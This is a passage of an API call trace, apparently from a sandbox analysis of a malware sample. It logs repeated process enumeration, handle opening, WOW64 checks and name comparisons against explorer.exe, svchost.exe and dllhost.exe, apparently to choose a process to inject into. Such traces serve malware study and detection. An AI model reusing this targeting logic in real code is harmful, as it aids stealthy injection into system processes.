lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0246.199] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.200] CloseHandle (hObject=0xd8) returned 1 [0246.200] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0246.200] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.200] CloseHandle (hObject=0xd8) returned 1 [0246.200] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0246.200] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0246.201] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0246.201] CloseHandle (hObject=0xd8) returned 1 [0246.201] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.201] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0246.202] CloseHandle (hObject=0xd4) returned 1 [0246.202] Sleep (dwMilliseconds=0x3e8) [0247.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0247.211] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0247.212] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0247.212] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0247.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0247.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0247.214] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0247.214] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0247.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0247.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0247.216] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0247.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0247.216] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0247.217] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0247.217] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0247.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0247.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0247.219] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0247.219] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0247.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0247.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0247.221] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.221] CloseHandle (hObject=0xd8) returned 1 [0247.221] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0247.221] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0247.221] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0247.221] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0247.221] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0247.222] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.222] CloseHandle (hObject=0xd8) returned 1 [0247.222] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0247.222] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0247.222] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0247.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0247.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0247.223] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0247.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0247.223] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.223] CloseHandle (hObject=0xd8) returned 1 [0247.224] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0247.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0247.224] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.224] CloseHandle (hObject=0xd8) returned 1 [0247.224] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0247.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0247.225] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.225] CloseHandle (hObject=0xd8) returned 1 [0247.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0247.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0247.225] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.225] CloseHandle (hObject=0xd8) returned 1 [0247.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0247.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0247.226] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.226] CloseHandle (hObject=0xd8) returned 1 [0247.226] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0247.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0247.226] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.226] CloseHandle (hObject=0xd8) returned 1 [0247.226] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0247.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0247.227] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.227] CloseHandle (hObject=0xd8) returned 1 [0247.227] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0247.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0247.228] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.228] CloseHandle (hObject=0xd8) returned 1 [0247.228] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0247.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0247.228] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.228] CloseHandle (hObject=0xd8) returned 1 [0247.228] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0247.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0247.229] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.229] CloseHandle (hObject=0xd8) returned 1 [0247.229] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0247.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0247.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.230] CloseHandle (hObject=0xd8) returned 1 [0247.230] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0247.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0247.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.230] CloseHandle (hObject=0xd8) returned 1 [0247.230] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0247.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0247.231] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.231] CloseHandle (hObject=0xd8) returned 1 [0247.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0247.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0247.232] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.232] CloseHandle (hObject=0xd8) returned 1 [0247.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0247.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0247.232] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.232] CloseHandle (hObject=0xd8) returned 1 [0247.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0247.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0247.233] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.233] CloseHandle (hObject=0xd8) returned 1 [0247.233] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0247.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0247.233] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.233] CloseHandle (hObject=0xd8) returned 1 [0247.233] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0247.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0247.234] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.234] CloseHandle (hObject=0xd8) returned 1 [0247.234] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0247.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0247.234] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.234] CloseHandle (hObject=0xd8) returned 1 [0247.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0247.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0247.235] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.235] CloseHandle (hObject=0xd8) returned 1 [0247.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0247.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0247.236] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0247.236] CloseHandle (hObject=0xd8) returned 1 [0247.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0247.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0247.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0247.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0247.238] Process32Next (in: 